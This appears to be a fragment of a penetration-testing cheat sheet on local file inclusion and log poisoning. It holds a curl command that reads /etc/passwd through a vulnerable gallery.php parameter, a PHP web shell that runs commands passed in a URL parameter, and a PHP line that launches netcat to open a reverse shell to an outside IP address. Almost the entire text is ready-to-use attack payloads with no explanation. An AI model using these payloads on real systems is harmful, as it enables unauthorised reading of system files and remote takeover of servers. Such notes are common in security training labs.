========================If you hate Browser : >>> curl -s http://10.11.1.111/gallery.php?page=/etc/passwd ========================Log Poisioning : <?php echo shell_exec($_GET['cmd']);?> <?php echo shell_exec("nc.exe 10.11.0.105 4444 -e cmd.exe") ?>
Last updated 2 years ago